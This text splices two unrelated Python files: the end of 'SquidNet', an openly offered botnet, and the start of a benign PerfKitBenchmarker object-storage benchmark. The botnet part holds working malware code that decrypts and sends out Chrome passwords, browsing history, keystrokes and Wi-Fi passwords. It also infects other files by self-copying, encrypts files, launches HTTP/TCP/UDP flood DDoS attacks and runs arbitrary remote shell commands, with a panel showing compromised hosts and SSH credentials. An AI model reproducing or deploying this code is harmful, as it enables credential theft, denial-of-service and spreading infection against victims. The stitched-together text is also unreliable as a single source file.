return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]
def decrypt_password(self,password, key):
try:
iv = password[3:15]
password = password[15:]
cipher = AES.new(key, AES.MODE_GCM, iv)
return cipher.decrypt(password)[:-16].decode()
except:
try:
return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])
except:
return ""
def main_password_yoinker(self):
msgtoserv = ""
key = self.get_encryption_key()
db_path = os.path.join(os.environ["USERPROFILE"], "AppData", "Local",
"Google", "Chrome", "User Data", "default", "Login Data")
filename = "ChromeData.db"
shutil.copyfile(db_path, filename)
db = sqlite3.connect(filename)
cursor = db.cursor()
cursor.execute(
"select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created")
for row in cursor.fetchall():
origin_url = row[0]
action_url = row[1]
username = row[2]
password = self.decrypt_password(row[3], key)
if username or password:
msgtoserv += f"\\nOrigin Url: {origin_url}\\nAction Url: {action_url}\\nUsername: {username}\\nPassword: {password}\\n"
else:
continue
cursor.close()
db.close()
try:
os.remove(filename)
except:
pass
return msgtoserv
def gotowebsite(self, website):
if sys.platform == "win32":
os.system(f'start {website}')
else:
os.system(f'open {website}')
def clone(self):
file_ending = sys.argv[0].split(".")
file_ending = file_ending[len(file_ending) - 1]
if "py" in file_ending:
own_file = open(sys.argv[0], "r")
own_content = own_file.readlines()
own_file.close()
lines = []
in_code = False
for line in own_content:
if "#-----SquidNet-Bot-Script-----#" in line:
in_code = True
if in_code:
lines.append(line)
if "#-----End-Of-Bot-----#" in line:
in_code = False
break
else:
own_file = open(sys.argv[0], "rb")
own_content = own_file.read()
own_file.close()
if sys.platform == "win32":
main_dir = f"C:/Users/{os.getlogin()}/"
else:
main_dir = f"/Users/{self.name}/"
os.chdir(main_dir)
workingdirs = []
workingdirs.append(main_dir)
workingdirs.append(os.getcwd())
dirlist = os.listdir()
for dirs in dirlist:
if "." in dirs:
pass
else:
workingdirs.append(main_dir + str(dirs))
dirlist = os.listdir()
for dirs in workingdirs:
try:
os.chdir(dirs)
except:
pass
for files in dirlist:
try:
if '.'+file_ending in files:
if "py" in file_ending:
file = open(files, "r")
content = file.readlines()
file.close()
if "#-----SquidNet-Bot-Script-----#" in content:
pass
else:
file = open(files, "w")
file.writelines(lines)
file.writelines("\\n\\n")
file.writelines(content)
file.close()
else:
file = open(files, "rb")
content = file.read()
file.close()
if own_content in content:
pass
else:
file = open(files, "wb")
file.write(own_content + "\\n\\n".encode())
file.write(content)
file.close()
except:
pass
def gotowebsite(self, website):
if sys.platform == "win32":
os.system(f'start {website}')
else:
os.system(f'open {website}')
def send_history(self):
dirs = os.getcwd()
if sys.platform == "win32":
os.chdir(f"C:/Users/{os.getlogin()}/AppData/Local/Google/Chrome/User Data/Default/")
elif sys.platform == "darwin":
os.chdir(f"/Users/{self.name}/Library/Application Support/Google/Chrome/User Data/Default/")
shutil.copyfile("History", dirs + "/History.db")
os.chdir(dirs)
History = sqlite3.connect("History.db")
cursor = History.cursor()
e = cursor.execute("SELECT last_visit_time, visit_count, title, url from urls")
for i in cursor.fetchall():
time = i[0]
visit_count = i[1]
url = i[3]
title = i[2]
epoch = datetime(1601, 1, 1)
url_time = epoch + timedelta(microseconds=time)
self.send(f"({url_time}) ({visit_count}) ({title}) ({url})".encode())
cursor.close()
History.close()
os.remove("History.db")
def run_cmd(self):
try:
if self.fileeditor:
if self.msg.startswith("!stopedit"):
self.send(f"File editor closed for {self.filename}.")
self.fileeditor = False
else:
try:
self.msg = "\\n" + self.msg
except:
self.msg = "\\n".encode() + self.msg
self.file = open(self.filename, "rb")
contents = self.file.read()
self.file.close()
self.file = open(self.filename, "wb")
self.file.write(contents)
self.file.write(self.msg.encode())
self.file.close()
else:
if self.msg.startswith('!httpflood'):
msg = self.msg.split()
ip = msg[1]
delay = float(msg[2])
self.dos = DDoS(ip, delay)
elif self.msg.startswith('!stopatk'):
try:
self.dos.stop_atk()
except:
pass
try:
self.tcpflood.Stop_Atk()
except:
pass
try:
self.udpflood.Stop_Atk()
except:
pass
elif self.msg.startswith('!cloneself'):
cloner = threading.Thread(target=self.clone)
cloner.start()
self.connection.send("Successfully replicated files.".encode())
elif self.msg.startswith('!changedirdesktop'):
self.changedir(self.desktop)
elif self.msg.startswith('!openfile'):
file = self.returnsecondstr(self.msg)
self.openfile(file)
elif self.msg.startswith('!changedir'):
dir = self.returnsecondstr(self.msg)
self.changedir(dir)
elif self.msg.startswith('!rmdir'):
dir = self.returnsecondstr(self.msg)
self.rmdir(dir)
elif self.msg.startswith('!rmfile'):
file = self.returnsecondstr(self.msg)
self.rmfile(file)
elif self.msg.startswith('!listdir'):
dirlist = self.listdir()
self.send(dirlist)
elif self.msg.startswith('!encdir'):
self.encdir()
elif self.msg.startswith('!decdir'):
self.decdir()
elif self.msg.startswith('!encfile'):
file = self.returnsecondstr(self.msg)
self.encfile(file)
elif self.msg.startswith('!decfile'):
file = self.returnsecondstr(self.msg)
self.decfile(file)
elif self.msg.startswith('!getinfo'):
msgtoserv = self.getinfo()
self.send(msgtoserv)
elif self.msg.startswith('!getip'):
self.send(self.getip())
elif self.msg.startswith("!keylog"):
if self.logging:
pass
else:
self.send("Started to send keyboard inputs.")
self.logging = True
elif self.msg.startswith("!stopkeylog"):
if self.logging:
self.send("Stopped Keylogging.")
self.logging = False
elif self.msg.startswith('!getwifi'):
wifi_passwords = self.obtainwifipass()
self.send(wifi_passwords)
elif self.msg.startswith('!savefile'):
file = self.returnsecondstr(self.msg)
self.sendfile(file)
elif self.msg.startswith('!viewfilecontent'):
file = self.returnsecondstr(self.msg)
self.file_content(file)
elif self.msg.startswith("!getchromehistory"):
self.send_history()
elif self.msg.startswith('!mkdir'):
main_msg = self.msg.split()
dirname = main_msg[1]
self.mkdir(dirname)
self.send(f"Successfully Created {dirname}")
elif self.msg.startswith('!getcwd'):
self.send(os.getcwd())
elif self.msg.startswith('!getos'):
self.send(sys.platform)
elif self.msg.startswith('!gotowebsite'):
main_msg = self.msg.split()
url = main_msg[1]
self.gotowebsite(url)
elif self.msg.startswith('!dwnldfile'):
main_msg = self.msg.split()
src = main_msg[1]
file = main_msg[2]
self.getfrinternet(src, file)
elif self.msg.startswith('!getpasswords'):
if sys.platform == "win32":
passwords = self.main_password_yoinker()
self.connection.send(passwords.encode())
else:
self.connection.send("Running on a non-windows machine - Cannot get passwords!")
elif self.msg.startswith("!editfile"):
try:
main_msg = self.msg.split()
self.editfile = open(str(main_msg[1]), "rb")
self.editfile.close()
self.filename = self.editfile.name
self.fileeditor = True
self.send(f"File editing mode activated for file {self.filename}")
except:
self.send("File cannot be opened on this computer.".encode())
self.fileeditor = False
elif self.msg.startswith("!mkfile"):
msg_split = self.msg.split()
try:
filename = msg_split[1]
file = open(str(filename), "w")
file.close()
self.send(f"File {filename} has been created in {os.getcwd()}".encode())
except:
self.send("Error with creating files.".encode())
elif self.msg.startswith("!rickroll"):
if sys.platform == "win32":
for i in range(10):
os.system("start https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO")
else:
for i in range(10):
os.system("open https://www.youtube.com/watch?v=dQw4w9WgXcQ&ab_channel=RickAstleyVEVO")
self.send("Just got rick rolled!".encode())
elif self.msg.startswith("!tcpflood"):
msg_split = self.msg.split()
ip = msg_split[1]
try:
port = int(msg_split[2])
except:
port = 80
try:
delay = float(msg_split[3])
except:
delay = 0
try:
pkt_size = int(msg_split[4])
except:
pkt_size = 1024
self.tcpflood = TCP_UDP_Flood(ip, port, delay, pkt_size)
self.tcp_flood = threading.Thread(target=self.tcpflood.TCP_Flood)
self.tcp_flood.start()
elif self.msg.startswith("!udpflood"):
msg_split = self.msg.split()
ip = msg_split[1]
try:
port = int(msg_split[2])
except:
port = 80
try:
delay = float(msg_split[3])
except:
delay = 0
try:
pkt_size = int(msg_split[4])
except:
pkt_size = 1024
self.udpflood = TCP_UDP_Flood(ip, port, delay, pkt_size)
self.udp_flood = threading.Thread(target=self.udpflood.UDP_Flood)
self.udp_flood.start()
else:
cmd = subprocess.Popen(self.msg, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
stdout = cmd.stdout.read()+cmd.stderr.read()
self.send(stdout)
except Exception as e:
self.send(f"Error in script: {e}".encode())
ip = '""" + self.ngroklink + """'
port = """ + str(self.ngrokport) + """
key = """ + str(self.key) + """
if sys.platform == "win32":
try:
isadmin = ctypes.windll.shell32.IsUserAnAdmin()
except:
isadmin = False
if isadmin:
bot = Bot(ip, port, key)
else:
exec_dir = sys.argv[0]
params = f'"{exec_dir}"'
try:
ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, params, None, 1)
except:
bot = Bot(ip, port, key)
else:
bot = Bot(ip, port, key)
#-----End-Of-Bot-----#
"""
return script
class Web_Interface:
"""Web Interface for seeing connections, some general info about them, and also
info about this script. There are some important info about some of the important
variables in the server, so that the User can learn more about it."""
def __init__(self, ip, port):
"""Initiation of the web-server, also where all the important variables are defined,
as well as the starting of the server and threads."""
self.ip = "localhost"
self.port = port
self.working = False
try:
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.bind((ip, port))
self.working = True
except Exception as e:
print(f"\n[+] Web-Interface is unable to start due to error: {e}")
if self.working:
self.packet = ""
self.listener = threading.Thread(target=self.listen)
self.listener.start()
self.packets = threading.Thread(target=self.packetmaker)
self.packets.start()
def packetmaker(self):
"""This function generates the packet to send
to the client and also for updating the Web-Interface."""
while True:
try:
conn_bots = ""
for x in botnet.botnet.info:
conn_bots += '<tr>\n<td>' + x.split()[0] + '</td>\n<td>' + x.split()[1] + "</td>\n<td>" + x.split()[
2] + "</td>\n<td>" + x.split()[3] + "</td>\n<td>" + x.split()[4] + "</td>\n</tr>\n"
conn_admin = ""
for x in botnet.botnet.admininfo:
conn_admin += '<tr>\n<td>' + x.split()[0] + '</td>\n<td>' + x.split()[1] + "</td>\n<td>" + \
x.split()[
2] + "</td>\n<td>" + x.split()[3] + "</td>\n<td>" + x.split()[
4] + "</td>\n</tr>\n"
conn_ssh = ""
for x in botnet.botnet.ssh_info:
conn_ssh += '<tr>\n<td>' + x.split()[0] + '</td>\n<td>' + x.split()[1] + "</td>\n<td>" + x.split()[
2] + "</td>\n</tr>\n"
self.packet = """
<!DOCTYPE html>
<html lang="en">
<meta charset="UTF-8">
<title>SquidNet Web-Interface</title>
<head>
<style>
table {
border: 3px solid black;
font-size: 50px
border-collapse: collapse;
font: arial;
}
td, th {
border: 1px solid black;
padding: 5px;
}
</style>
</head>
<body>
<h1>SquidNet Web Interface<h1>
<h3>(Clearly HTML is not my base language so it doesn't look too good)<h3>
<h1>Connections To the Botnet<h1>
<table>
<thead>
<tr>
<th>Hostname</th>
<th>IP Address</th>
<th>UserName</th>
<th>Connection</th>
<th>OS</th>
</tr>
</thead>
<tbody>
""" + str(conn_bots) + """
</tbody>
</table>
<h1>Admin Connections To the Botnet<h1>
<table>
<thead>
<tr>
<th>Hostname</th>
<th>IP Address</th>
<th>UserName</th>
<th>Connection</th>
<th>OS</th>
</tr>
</thead>
<tbody>
""" + str(conn_admin) + """
</tbody>
</table>
<h1>SSH Connections to the Botnet</h1>
<table>
<thead>
<tr>
<th>Hostname</th>
<th>IP Address</th>
<th>Password</th>
</tr>
</thead>
<tbody>
""" + str(conn_ssh) + """
</tbody>
</table>
<h2>About:</h2>
</h4>Squidnet is an SSH and TCP Botnet Hybrid. The Botnet has the ability to take control of computers compromised by the
bot script, as well as gaining access to ssh servers. It also has a form of security in which admins need to provide a username and
a password in order to gain access. They will be kicked if they do not enter the correct credentials. The Bots can do many
things including DDoS Attacks(HTTP, TCP and UDP Floods), sending their passwords to the Botnet, editing files remotely,
and many more.</h4>
<h2>Important Info</h2>
<h4>Server Log file: """ + os.getcwd() + """\\servlog.txt - Good for checking for errors and server output.</h4>
<h4>Server IP: """ + str(botnet.botnet.ngroklink) + """:""" + str(botnet.botnet.ngrokport) + """ - How Bots will connect to the Botnet.</h4>
<h4>Admin Username: """ + str(botnet.botnet.admin_name) + """ - Username Used by Admins to obtain access to the Botnet</h4>
<h4>Admin Password: """ + str(botnet.botnet.passw) + """ - Password Used by Admins to obtain access to the Botnet.</h4>
<h4>Encryption Token: """ + str(botnet.botnet.key) + """ - Used for encrypting files on the bots.</h4>
<h4>Brute-Forcing-File: """ + str(botnet.botnet.passfilename) + """ - Used for SSH-Brute-Forcing.</h4>
</body>
</html>
"""
time.sleep(1)
except:
pass
def listen(self):
"""Listens for and accepts connections."""
while True:
self.server.listen()
conn, ip = self.server.accept()
handler = threading.Thread(target=self.handler, args=(conn,))
handler.start()
def handler(self, conn):
"""Handles the connections and sends the HTTP Code to the client
to view the Web Interface."""
conn.send('HTTP/1.0 200 OK\n'.encode())
conn.send('Content-Type: text/html\n'.encode())
conn.send('\n'.encode())
conn.send(self.packet.encode())
if sys.platform == "win32":
pass
else:
conn.close()
if __name__ == '__main__':
"""Clears CMD Output."""
if sys.platform == "win32":
os.system("cls")
else:
os.system("clear")
try:
"""Tries to import this module."""
import paramiko
except:
"""Since paramiko is not an official Python Module,
the user may need to download Paramiko themself."""
print(Botnet.log_logo())
print("\n[+] Missing Module: Paramiko\n[+] If you have python 3 installed, try: pip install paramiko")
sys.exit()
botnet = ArguementParse()
|
object_storage_service_benchmark.py
|
# Copyright 2016 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Object (blob) Storage benchmark tests.
There are two categories of tests here: 1) tests based on CLI tools, and 2)
tests that use APIs to access the storage provider.
For 1), we aim to simulate a typical use case of a common user of a storage
provider: uploading and downloading a set of files of different sizes to and
from a local directory.
For 2), we aim to measure the performance of a storage provider more directly
by accessing it via APIs. Here are the main scenarios covered in this
category:
a: Single byte object upload and download, measures latency.
b: List-after-write and list-after-update consistency measurement.
c: Single stream large object upload and download, measures throughput.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import enum
import glob
import json
import logging
import os
import posixpath
import re
import threading
import time
import uuid
from absl import flags
import numpy as np
from perfkitbenchmarker import configs
from perfkitbenchmarker import data
from perfkitbenchmarker import errors
from perfkitbenchmarker import flag_util
from perfkitbenchmarker import object_storage_service
from perfkitbenchmarker import providers
from perfkitbenchmarker import sample
from perfkitbenchmarker import units
from perfkitbenchmarker import vm_util
from perfkitbenchmarker.providers.gcp import gcs
from perfkitbenchmarker.sample import PercentileCalculator # noqa
import six
from six.moves import range
from six.moves import zip
flags.DEFINE_enum('storage', providers.GCP,
[providers.GCP, providers.AWS,
providers.AZURE, providers.OPENSTACK],
'storage provider (GCP/AZURE/AWS/OPENSTACK) to use.')
flags.DEFINE_string('object_storage_region', None,
'Storage region for object storage benchmark.')
flags.DEFINE_string('object_storage_gcs_multiregion', None,
'Storage multiregion for GCS in object storage benchmark.')
flags.DEFINE_string('object_storage_storage_class', None,
'Storage class to use in object storage benchmark.')
flags.DEFINE_enum('object_storage_scenario', 'all',
['all', 'cli', 'api_data', 'api_namespace',
'api_multistream', 'api_multistream_writes',
'api_multistream_reads'],
'select all, or one particular scenario to run: \n'
'ALL: runs all scenarios. This is the default. \n'
'cli: runs the command line only scenario. \n'
'api_data: runs API based benchmarking for data paths. \n'
'api_namespace: runs API based benchmarking for namespace '
'operations. \n'
'api_multistream: runs API-based benchmarking with multiple '
'upload/download streams.\n'
'api_multistream_writes: runs API-based benchmarking with '
'multiple upload streams.\n'
'api_multistream_reads: runs API-based benchmarking with '
'multiple download streams.')
flags.DEFINE_string('object_storage_bucket_name', None,
'If set, the bucket will be created with this name')
flags.DEFINE_boolean('object_storage_apply_region_suffix_to_bucket_name', False,
'If set, the region will be appended to the bucket name.')
flags.DEFINE_enum('cli_test_size', 'normal',
['normal', 'large'],
'size of the cli tests. Normal means a mixture of various \n'
'object sizes up to 32MiB (see '
'data/cloud-storage-workload.sh). \n'
'Large means all objects are of at least 1GiB.')
flags.DEFINE_integer('object_storage_multistream_objects_per_stream', 1000,
'Number of objects to send and/or receive per stream. '
'Only applies to the api_multistream scenario.',
lower_bound=1)
flag_util.DEFINE_yaml('object_storage_object_sizes', '1KB',
'Size of objects to send and/or receive. Only applies to '
'the api_multistream scenario. Examples: 1KB, '
'{1KB: 50%, 10KB: 50%}')
flags.DEFINE_integer('object_storage_streams_per_vm', 10,
'Number of independent streams per VM. Only applies to '
'the api_multistream scenario.',
lower_bound=1)
flags.DEFINE_integer('object_storage_list_consistency_iterations', 200,
'Number of iterations to perform for the api_namespace '
'list consistency benchmark. This flag is mainly for '
'regression testing in the benchmarks. Reduce the number '
'to shorten the execution time of the api_namespace '
'scenario. However, to get useful metrics from the '
'api_namespace scenario, a high number of iterations '
'should be used (>=200).')
flags.DEFINE_enum('object_storage_object_naming_scheme', 'sequential_by_stream',
['sequential_by_stream',
'approximately_sequential'],
'How objects will be named. Only applies to the '
'api_multistream benchmark. '
'sequential_by_stream: object names from each stream '
'will be sequential, but different streams will have '
'different name prefixes. '
'approximately_sequential: object names from all '
'streams will roughly increase together.')
flags.DEFINE_string('object_storage_objects_written_file_prefix', None,
'If specified, the bucket and all of the objects will not '
'be deleted. Instead, a JSON file recording the bucket name '
'and the objects written will be created with the specified '
'prefix. This prefix can be passed to this benchmark in a '
'later run via the '
'object_storage_read_objects_prefix flag. Only valid for '
'the api_multistream and api_multistream_writes scenarios. '
'The filename is appended with the date and time so that '
'later runs can be given a prefix and a minimum age of '
'objects. The later run will then use the oldest objects '
'available or fail if there is no file with an old enough '
'date. The prefix is also appended with the region so that '
'later runs will read objects from the same region.')
flags.DEFINE_string('object_storage_read_objects_prefix', None,
'If specified, no new bucket or objects will be created. '
'Instead, the benchmark will read the objects listed in '
'a file with the specified prefix that was written some '
'number of hours before (as specified by '
'object_storage_read_objects_min_hours). Only valid for '
'the api_multistream_reads scenario.')
flags.DEFINE_integer('object_storage_read_objects_min_hours', 72, 'The minimum '
'number of hours from which to read objects that were '
'written on a previous run. Used in combination with '
'object_storage_read_objects_prefix.')
flags.DEFINE_boolean('object_storage_dont_delete_bucket', False,
'If True, the storage bucket won\'t be deleted. Useful '
'for running the api_multistream_reads scenario multiple '
'times against the same objects.')
flags.DEFINE_string('object_storage_worker_output', None,
'If set, the worker threads\' output will be written to the '
'path provided.')
flags.DEFINE_float('object_storage_latency_histogram_interval', None,
'If set, a latency histogram sample will be created with '
'buckets of the specified interval in seconds. Individual '
'histogram samples are created for each different object '
'size in the distribution, because it is easy to aggregate '
'the histograms during post-processing, but impossible to '
'go in the opposite direction.')
flags.DEFINE_boolean(
'record_individual_latency_samples', False,
'If set, record the latency of each download and upload '
'in its own sample.')
flags.DEFINE_boolean(
'object_storage_bulk_delete', False,
'If true, deletes objects with bulk delete client request and records '
'average latency per object. Otherwise, deletes one object per request '
'and records individual delete latency.'
)
FLAGS = flags.FLAGS
BENCHMARK_INFO = {'name': 'object_storage_service',
'description':
'Object/blob storage service benchmarks. Specify '
'--object_storage_scenario '
'to select a set of sub-benchmarks to run. default is all.',
'scratch_disk': False,
'num_machines': 1}
BENCHMARK_NAME = 'object_storage_service'
BENCHMARK_CONFIG = """
object_storage_service:
description: >
Object/blob storage service benchmarks. Specify
--object_storage_scenario
to select a set of sub-benchmarks to run. default is all.
vm_groups:
default:
vm_spec: *default_single_core
vm_count: null
flags:
gcloud_scopes: https://www.googleapis.com/auth/devstorage.read_write
"""
DATA_FILE = 'cloud-storage-workload.sh'
# size of all data used in the CLI tests.
DATA_SIZE_IN_BYTES = 256.1 * 1024 * 1024
DATA_SIZE_IN_MBITS = 8 * DATA_SIZE_IN_BYTES / 1000 / 1000
LARGE_DATA_SIZE_IN_BYTES = 3 * 1024 * 1024 * 1024
LARGE_DATA_SIZE_IN_MBITS = 8 * LARGE_DATA_SIZE_IN_BYTES / 1000 / 1000
API_TEST_SCRIPT = 'object_storage_api_tests.py'
API_TEST_SCRIPTS_DIR = 'object_storage_api_test_scripts'
# Files that will be sent to the remote VM as a package for API test script.
API_TEST_SCRIPT_PACKAGE_FILES = [
'__init__.py', 'object_storage_interface.py', 'azure_flags.py',
'gcs_flags.py', 's3_flags.py'
]
SCRIPT_DIR = '/tmp/run'
REMOTE_PACKAGE_DIR = posixpath.join(SCRIPT_DIR, 'providers')
DOWNLOAD_DIRECTORY = posixpath.join(SCRIPT_DIR, 'temp')
# Various constants to name the result metrics.
THROUGHPUT_UNIT = 'Mbps'
LATENCY_UNIT = 'seconds'
NA_UNIT = 'na'
PERCENTILES_LIST = ['p0.1', 'p1', 'p5', 'p10', 'p50', 'p90', 'p95', 'p99',
'p99.9', 'average', 'stddev']
UPLOAD_THROUGHPUT_VIA_CLI = 'upload throughput via cli Mbps'
DOWNLOAD_THROUGHPUT_VIA_CLI = 'download throughput via cli Mbps'
CLI_TEST_ITERATION_COUNT = 10
LARGE_CLI_TEST_ITERATION_COUNT = 20
CLI_TEST_FAILURE_TOLERANCE = 0.05
# Azure does not parallelize operations in its CLI tools. We have to
# upload or download the 100 test files sequentially, which makes each
# iteration take a very long time, so we run only 3 iterations.
CLI_TEST_ITERATION_COUNT_AZURE = 3
SINGLE_STREAM_THROUGHPUT = 'single stream %s throughput Mbps'
ONE_BYTE_LATENCY = 'one byte %s latency'
LIST_CONSISTENCY_SCENARIOS = ['list-after-write', 'list-after-update']
LIST_CONSISTENCY_PERCENTAGE = 'consistency percentage'
LIST_INCONSISTENCY_WINDOW = 'inconsistency window'
LIST_LATENCY = 'latency'
CONTENT_REMOVAL_RETRY_LIMIT = 5
# Sometimes, even when a bucket is completely empty, the service provider will
# refuse to remove it with a "BucketNotEmpty" error for up to 1 hour. We keep
# retrying until we reach that one-hour limit, since this wait is necessary
# for some providers.
BUCKET_REMOVAL_RETRY_LIMIT = 120
RETRY_WAIT_INTERVAL_SECONDS = 30
# GCS has special region handling until we can remove it :(
DEFAULT_GCS_MULTIREGION = 'us'
# Keys for flag names and metadata values
OBJECT_STORAGE_REGION = 'object_storage_region'
REGIONAL_BUCKET_LOCATION = 'regional_bucket_location'
OBJECT_STORAGE_GCS_MULTIREGION = 'object_storage_gcs_multiregion'
GCS_MULTIREGION_LOCATION = 'gcs_multiregion_location'
DEFAULT = 'default'
# This accounts for the overhead of running RemoteCommand() on a VM.
MULTISTREAM_DELAY_PER_VM = 5.0 * units.second
# We wait this long for each stream. Note that this is multiplied by
# the number of streams per VM, not the total number of streams.
MULTISTREAM_DELAY_PER_STREAM = 0.1 * units.second
# And add a constant factor for PKB-side processing
MULTISTREAM_DELAY_CONSTANT = 10.0 * units.second
# Max number of delete operations per second
MULTISTREAM_DELETE_OPS_PER_SEC = 3500
# The multistream write benchmark writes a file in the VM's /tmp with
# the objects it has written, which is used by the multistream read
# benchmark. This is the filename.
OBJECTS_WRITTEN_FILE = 'pkb-objects-written'
# If the gap between different stream starts and ends is above a
# certain proportion of the total time, we log a warning because we
# are throwing out a lot of information. We also put the warning in
# the sample metadata.
MULTISTREAM_STREAM_GAP_THRESHOLD = 0.2
# The API test script uses different names for providers than this
# script :(
STORAGE_TO_API_SCRIPT_DICT = {
providers.GCP: 'GCS',
providers.AWS: 'S3',
providers.AZURE: 'AZURE'}
_SECONDS_PER_HOUR = 60 * 60
class MultistreamOperationType(enum.Enum):
"""MultiStream Operations supported by object_storage_api_tests script."""
download = 1
upload = 2
delete = 3
bulk_delete = 4
def GetConfig(user_config):
return configs.LoadConfig(BENCHMARK_CONFIG, user_config, BENCHMARK_NAME)
# Raised when we fail to remove a bucket or its content after many retries.
# TODO: add a new class of error "ObjectStorageError" to errors.py and remove
# this one.
class BucketRemovalError(Exception):
pass
class NotEnoughResultsError(Exception):
pass
class ColdDataError(Exception):
"""Exception indicating that the cold object data does not exist."""
def _JsonStringToPercentileResults(results, json_input, metric_name,
metric_unit, metadata):
"""This function parses a percentile result string in Json format.
Args:
results: The final result set to put result in.
json_input: The input in Json format about percentiles.
metric_name: Name of the metric.
metric_unit: Unit of the metric.
metadata: The metadata to be included.
"""
result = json.loads(json_input)
for percentile in PERCENTILES_LIST:
results.append(sample.Sample(
('%s %s') % (metric_name, percentile),
float(result[percentile]),
metric_unit,
metadata))
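# As a rough illustration (values made up), the JSON handled above maps each
# entry of PERCENTILES_LIST to a number, e.g.:
#   '{"p0.1": 0.008, "p1": 0.009, "p5": 0.010, "p10": 0.011, "p50": 0.015,
#     "p90": 0.030, "p95": 0.040, "p99": 0.070, "p99.9": 0.120,
#     "average": 0.018, "stddev": 0.006}'
# and _JsonStringToPercentileResults emits one Sample per percentile from it.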
def _GetClientLibVersion(vm, library_name):
"""This function returns the version of client lib installed on a vm.
Args:
vm: the VM to get the client lib version from.
library_name: the name of the client lib.
Returns:
The version string of the client.
"""
version, _ = vm.RemoteCommand('pip3 show %s |grep Version' % library_name)
logging.info('%s client lib version is: %s', library_name, version)
return version
def MultiThreadStartDelay(num_vms, threads_per_vm):
"""Find how long in the future we can simultaneously start threads on VMs.
Args:
num_vms: number of VMs to start threads on.
threads_per_vm: number of threads to start on each VM.
Returns:
A units.Quantity of time such that if we want to start
threads_per_vm threads on num_vms VMs, we can start the threads
sequentially, tell each of them to sleep for this number of
seconds, and we expect that we will be able to start the last
thread before the delay has finished.
"""
return (
MULTISTREAM_DELAY_CONSTANT +
MULTISTREAM_DELAY_PER_VM * num_vms +
MULTISTREAM_DELAY_PER_STREAM * threads_per_vm)
def MultiThreadDeleteDelay(num_vms, threads_per_vm):
"""Calculates delay time between delete operation.
Args:
num_vms: number of VMs to start threads on.
threads_per_vm: number of threads to start on each VM.
Returns:
float. Delay time in seconds based on number of vms and threads and the
maximum number of delete operations per second.
"""
return (num_vms * threads_per_vm) / (MULTISTREAM_DELETE_OPS_PER_SEC)
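# As a worked example using the constants defined above, with 2 VMs and 10
# streams per VM:
#   MultiThreadStartDelay(2, 10)  = 10.0s + 5.0s * 2 + 0.1s * 10 = 21 seconds
#   MultiThreadDeleteDelay(2, 10) = (2 * 10) / 3500 ~= 0.0057 seconds per delete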
def _ProcessMultiStreamResults(start_times, latencies, sizes, operation,
all_sizes, results, metadata=None):
"""Read and process results from the api_multistream worker process.
Results will be reported per-object size and combined for all
objects.
Args:
start_times: a list of numpy arrays. Operation start times, as
POSIX timestamps.
latencies: a list of numpy arrays. Operation durations, in seconds.
sizes: a list of numpy arrays. Object sizes used in each
operation, in bytes.
operation: 'upload' or 'download'. The operation the results are from.
all_sizes: a sequence of integers. all object sizes in the
distribution used, in bytes.
results: a list to append Sample objects to.
metadata: dict. Base sample metadata
"""
num_streams = FLAGS.object_storage_streams_per_vm * FLAGS.num_vms
assert len(start_times) == num_streams
assert len(latencies) == num_streams
assert len(sizes) == num_streams
if metadata is None:
metadata = {}
metadata['num_streams'] = num_streams
metadata['objects_per_stream'] = (
FLAGS.object_storage_multistream_objects_per_stream)
metadata['object_naming'] = FLAGS.object_storage_object_naming_scheme
min_num_records = min((len(start_time) for start_time in start_times))
num_records = sum((len(start_time) for start_time in start_times))
logging.info('Processing %s total operation records', num_records)
stop_times = [start_time + latency
for start_time, latency in zip(start_times, latencies)]
last_start_time = max((start_time[0] for start_time in start_times))
first_stop_time = min((stop_time[-1] for stop_time in stop_times))
# Compute how well our synchronization worked
first_start_time = min((start_time[0] for start_time in start_times))
last_stop_time = max((stop_time[-1] for stop_time in stop_times))
start_gap = last_start_time - first_start_time
stop_gap = last_stop_time - first_stop_time
if ((start_gap + stop_gap) / (last_stop_time - first_start_time) <
MULTISTREAM_STREAM_GAP_THRESHOLD):
logging.info(
'First stream started %s seconds before last stream started', start_gap)
logging.info(
'Last stream ended %s seconds after first stream ended', stop_gap)
else:
logging.warning(
'Difference between first and last stream start/end times was %s and '
'%s, which is more than %s of the benchmark time %s.',
start_gap, stop_gap, MULTISTREAM_STREAM_GAP_THRESHOLD,
(last_stop_time - first_start_time))
metadata['stream_gap_above_threshold'] = True
# Find the indexes in each stream where all streams are active,
# following Python's [inclusive, exclusive) index convention.
active_start_indexes = np.full(num_streams, 0)
for index, start_time in enumerate(start_times):
for i in range(len(start_time)):
if start_time[i] >= last_start_time:
active_start_indexes[index] = i
break
active_stop_indexes = np.full(num_streams, min_num_records)
for index, stop_time in enumerate(stop_times):
for i in range(len(stop_time) - 1, -1, -1):
if stop_time[i] <= first_stop_time:
active_stop_indexes[index] = i + 1
break
active_latencies = [
latencies[i][active_start_indexes[i]:active_stop_indexes[i]]
for i in range(num_streams)]
active_sizes = [
sizes[i][active_start_indexes[i]:active_stop_indexes[i]]
for i in range(num_streams)]
all_active_latencies = np.concatenate(active_latencies)
all_active_sizes = np.concatenate(active_sizes)
# Don't publish the full distribution in the metadata because doing
# so might break regexp-based parsers that assume that all metadata
# values are simple Python objects. However, do add an
# 'object_size_B' metadata field even for the full results because
# searching metadata is easier when all records with the same metric
# name have the same set of metadata fields.
distribution_metadata = metadata.copy()
if len(all_sizes) == 1:
distribution_metadata['object_size_B'] = all_sizes[0]
else:
distribution_metadata['object_size_B'] = 'distribution'
latency_prefix = 'Multi-stream %s latency' % operation
logging.info('Processing %s multi-stream %s results for the full '
'distribution.', len(all_active_latencies), operation)
_AppendPercentilesToResults(
results,
all_active_latencies,
latency_prefix,
LATENCY_UNIT,
distribution_metadata)
# Publish by-size and full-distribution stats even if there's only
# one size in the distribution, because it simplifies postprocessing
# of results.
for size in all_sizes:
this_size_metadata = metadata.copy()
